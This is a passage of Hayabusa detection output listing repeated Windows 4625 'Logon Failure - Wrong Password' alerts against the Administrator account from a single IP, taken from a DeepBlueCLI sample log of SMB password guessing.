NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0HH6zUUoL0qlfFC2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AG4pYsjob1iwlOc0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dNCX5tZ0nF1foTLW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vO82Kb0kboVFuJy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DptE2C8ZK3AxCb43 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.871 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NC8manvVP5pU8F3N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.926 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m00bI5welsLUWmwJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4shyxJk2PiH1TDlj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.014 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xZyN2WO3UVY0WQs6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.053 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oSQjAMckifap5r1k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qixqXiX0mVcuXe37 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.126 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIfJCJz6l36WMeY9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SZxv5U7uoN6E8c8E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mlIfE0N32OQeWuNw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkZcjpTmHcJ0uX38 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GZfaHr2Yq6xkRjOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jvy0EIiPSnom7pn3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TN9PUb0BgI3u8Xax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xCgz5BNpQgLgW0Xi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: po2GBdrXr3XtBsWR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O2rgo6jHcqu10IGY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MLblUOGzYzVA47E9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ysuA1xpYuAGRNONJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ksedziaGzXk5VNlS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.711 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: irIfGLQdhtRRGwuo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YCf6WUjiS11hHqKT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1o0CTT7GsWfCWuHx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F6Jr8XrUsmTiSdol : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Buj66iuSkLEQdKnQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L1wOLI51HqfkgO6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X4oe273WXOICzkwW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1c7nGezYNJ70jR6R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ajuZ09zGeuovCQLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4k7xV7soNF4mHlz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CtdqW8zOw1GoQcvA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aY6FLi1edRZWrRZN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ah1JoKfxJzQhCCVL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIMOZRGcv4o33BWd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nmLyLJoVZz6fJ62I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aGufqEGD4hFf2XLM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7IEdKy2H5Agblpjt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XT9k8C05GVLBNPdl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5opHh8HelCXtR5Cm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K0dntDwYLmag9efo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.514 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UQfZOMFV9LtY7r2S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y01v38dTUIsJEZIv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pCP8x2QBZ6IvMEnf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.739 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hgcbYjw3kKqlK7Di : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TFU97Tq3e7IWvSKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1hUCvaS1yM2FU9AE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8JInVlBqTSfT4J1s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EjXRQUGDKBZaMkw3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fZPXNxkGOrld5eCR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OBDhSrF7DZ1KBRa8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dQ7TKJOGibAVNoCH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.054 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZE1GARxx03m4FtEL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gf3VLLTxsK85bsrv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.123 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 58G6MFVbW55JZIV5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yxne9LqZCqBf3qkc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ssZya6gArnuepKyW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rsDEj6o0NaKUYPZL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pELSIsupIYAxPCtv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: urHCDmdCfNexxUHf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: czGXZFukLquA9Mce : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: icWMY9pKCQMyTxJg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v28FLC2WXEXSUiI5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.510 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FwhjHww5iA51SFjp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 96BwmhKqDIojhdRA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DiRvofjwoeAdHYrv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.655 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BNLdOrPwbvYELiCc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x15WKTspmg2ALHaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QMoQWddkcYtCmoKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jhTbfX42Pwn7OA2k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yXcbUCgAhVFfqLc3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.856 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GHyXVM0jpaKBiY9N : IP Address: 192.168.198.149 : AuthPackage: 